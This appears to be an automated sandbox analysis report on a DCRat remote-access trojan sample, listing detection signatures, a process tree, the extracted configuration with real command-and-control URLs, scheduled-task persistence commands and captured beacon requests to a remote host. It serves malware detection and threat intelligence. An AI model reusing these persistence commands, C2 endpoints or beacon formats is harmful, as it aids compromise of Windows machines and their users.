Windows Analysis Report
4c6fK85tK7.exe

Overview

General Information

Sample name: 4c6fK85tK7.exe
renamed because original name is a hash value
Original sample name: 68DFE1E08B8CC7D19FF72334FDD09DB8.exe
Analysis ID: 1431492
MD5: 68dfe1e08b8cc7d19ff72334fdd09db8
SHA1: 34fb36f9b553c26b0753f540b6a8af1760bb74dc
SHA256: a5f4363625928d7fb64087212bd9d094972260739b274f44b53bbbd5be6d19b7
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4c6fK85tK7.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\4c6fK85tK7.exe" MD5: 68DFE1E08B8CC7D19FF72334FDD09DB8)
    • yberLoad.exe (PID: 4588 cmdline: "C:\Users\user\AppData\Local\Temp\ yberLoad.exe" MD5: A84070968353EDCC9559F54DEEDD8FE9)
      • MVPLoader.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\MVPLoader.exe" MD5: F1F43CF5A79E51BA13EF602B25C63A9E)
      • CyberLoader.exe (PID: 5284 cmdline: "C:\Users\user\AppData\Local\Temp\CyberLoader.exe" MD5: 1B4CF2A40E1387CF97DFBE1303C9619A)
        • wscript.exe (PID: 7188 cmdline: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • componentWininto.exe (PID: 7352 cmdline: "C:\msPortRefnetdhcp\componentWininto.exe" MD5: 53758CEA18D59182A809208313D5042A)
              • schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7844 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7876 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 13 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7892 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7908 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 14 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 11 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7940 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7956 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • cmd.exe (PID: 7988 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • w32tm.exe (PID: 8040 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                • zufsVvjyWcGfJF.exe (PID: 7896 cmdline: "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe" MD5: 53758CEA18D59182A809208313D5042A)
        • wscript.exe (PID: 7228 cmdline: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • zufsVvjyWcGfJF.exe (PID: 8088 cmdline: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe MD5: 53758CEA18D59182A809208313D5042A)
  • zufsVvjyWcGfJF.exe (PID: 8120 cmdline: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe MD5: 53758CEA18D59182A809208313D5042A)
  • wscript.exe (PID: 7904 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 8044 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
      • wscript.exe (PID: 8124 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WmiPrvSE.exe (PID: 2992 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
          • wscript.exe (PID: 4128 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • WmiPrvSE.exe (PID: 6112 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
              • wscript.exe (PID: 6440 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                • WmiPrvSE.exe (PID: 4076 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
              • wscript.exe (PID: 6572 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • wscript.exe (PID: 7096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 8168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 3668 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\da4d56e5-dd25-4b11-bec9-392111f2ec60.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
{"SCRT": "{\"C\":\"#\",\"L\":\"~\",\"9\":\"(\",\"Z\":\"`\",\"J\":\"@\",\"k\":\"_\",\"N\":\"!\",\"a\":\"$\",\"i\":\"*\",\"M\":\">\",\"4\":\"^\",\"0\":\",\",\"h\":\"|\",\"E\":\";\",\"A\":\"-\",\"I\":\"%\",\"d\":\"&\",\"n\":\".\",\"H\":\")\",\"m\":\" \",\"V\":\"<\"}", "PCRT": "{\"M\":\"%\",\"B\":\"&\",\"Z\":\"^\",\"W\":\"|\",\"R\":\"`\",\"t\":\",\",\"5\":\"~\",\"Q\":\"-\",\"z\":\"$\",\"F\":\"*\",\"d\":\")\",\"U\":\"<\",\"E\":\">\",\"I\":\"@\",\"m\":\"#\",\"v\":\"_\",\"G\":\"!\",\"j\":\".\",\"V\":\";\",\"N\":\" \",\"2\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DSAHi0MzOtJS6OWpXdgD", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "H2": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "T": "0"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Downloads\WmiPrvSE.exe", CommandLine: "C:\Users\Default User\Downloads\WmiPrvSE.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Downloads\WmiPrvSE.exe, NewProcessName: C:\Users\Default\Downloads\WmiPrvSE.exe, OriginalFileName: C:\Users\Default\Downloads\WmiPrvSE.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7904, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\Default User\Downloads\WmiPrvSE.exe", ProcessId: 8044, ProcessName: WmiPrvSE.exe
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\msPortRefnetdhcp\componentWininto.exe, ProcessId: 7352, TargetFilename: C:\Users\Default User\Downloads\WmiPrvSE.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8048, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ProcessId: 7904, ProcessName: wscript.exe
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 141.8.194.74, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\Downloads\WmiPrvSE.exe, Initiated: true, ProcessId: 8044, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49743
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8048, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ProcessId: 7904, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8048, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ProcessId: 7904, ProcessName: wscript.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\CyberLoader.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, ParentProcessId: 5284, ParentProcessName: CyberLoader.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" , ProcessId: 7188, ProcessName: wscript.exe
            No Snort rule has matched

            AV Detection

            Source: 4c6fK85tK7.exe, Avira: detected
            Source: C:\Recovery\zufsVvjyWcGfJF.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat, Avira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Users\user\AppData\Local\Temp\e9b737bd-75a6-4059-b77c-a41b4b38424b.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\55dc47f4-7c66-4fb4-aa2a-4ea28e92c8cc.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, Avira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\msPortRefnetdhcp\componentWininto.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe, Avira: detection malicious, Label: VBS/Runner.VPG
            Source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"C\":\"#\",\"L\":\"~\",\"9\":\"(\",\"Z\":\"`\",\"J\":\"@\",\"k\":\"_\",\"N\":\"!\",\"a\":\"$\",\"i\":\"*\",\"M\":\">\",\"4\":\"^\",\"0\":\",\",\"h\":\"|\",\"E\":\";\",\"A\":\"-\",\"I\":\"%\",\"d\":\"&\",\"n\":\".\",\"H\":\")\",\"m\":\" \",\"V\":\"<\"}", "PCRT": "{\"M\":\"%\",\"B\":\"&\",\"Z\":\"^\",\"W\":\"|\",\"R\":\"`\",\"t\":\",\",\"5\":\"~\",\"Q\":\"-\",\"z\":\"$\",\"F\":\"*\",\"d\":\")\",\"U\":\"<\",\"E\":\">\",\"I\":\"@\",\"m\":\"#\",\"v\":\"_\",\"G\":\"!\",\"j\":\".\",\"V\":\";\",\"N\":\" \",\"2\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DSAHi0MzOtJS6OWpXdgD", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "H2": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "T": "0"}
            Source: C:\Recovery\zufsVvjyWcGfJF.exe, ReversingLabs: Detection: 87%
            Source: C:\Recovery\zufsVvjyWcGfJF.exe, Virustotal: Detection: 64%
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe, ReversingLabs: Detection: 87%
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe, Virustotal: Detection: 64%
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe, ReversingLabs: Detection: 95%
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe, Virustotal: Detection: 85%
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, ReversingLabs: Detection: 70%
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, Virustotal: Detection: 60%
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe, ReversingLabs: Detection: 87%
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe, Virustotal: Detection: 64%
            Source: C:\msPortRefnetdhcp\componentWininto.exe, ReversingLabs: Detection: 87%
            Source: C:\msPortRefnetdhcp\componentWininto.exe, Virustotal: Detection: 64%
            Source: 4c6fK85tK7.exe, ReversingLabs: Detection: 97%
            Source: 4c6fK85tK7.exe, Virustotal: Detection: 84%
            Source: C:\Recovery\zufsVvjyWcGfJF.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, Joe Sandbox ML: detected
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe, Joe Sandbox ML: detected
            Source: C:\msPortRefnetdhcp\componentWininto.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe, Joe Sandbox ML: detected
            Source: 4c6fK85tK7.exe, Joe Sandbox ML: detected
            Source: 4c6fK85tK7.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4c6fK85tK7.exe
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, Code function: 3_2_0027A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0027A5F4
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, Code function: 3_2_0028B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0028B8E0
            Source: C:\msPortRefnetdhcp\componentWininto.exe, File opened: C:\Users\user
            Source: C:\msPortRefnetdhcp\componentWininto.exe, File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\msPortRefnetdhcp\componentWininto.exe, File opened: C:\Users\user\AppData
            Source: C:\msPortRefnetdhcp\componentWininto.exe, File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\msPortRefnetdhcp\componentWininto.exe, File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\msPortRefnetdhcp\componentWininto.exe, File opened: C:\Users\user\AppData\Local

            Networking

            Source: Malware configuration extractor, URLs: http://a0947291.xsph.ru/@=kTYjFmNwYTM
            Source: Joe Sandbox View, IP Address: 141.8.194.74
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ru
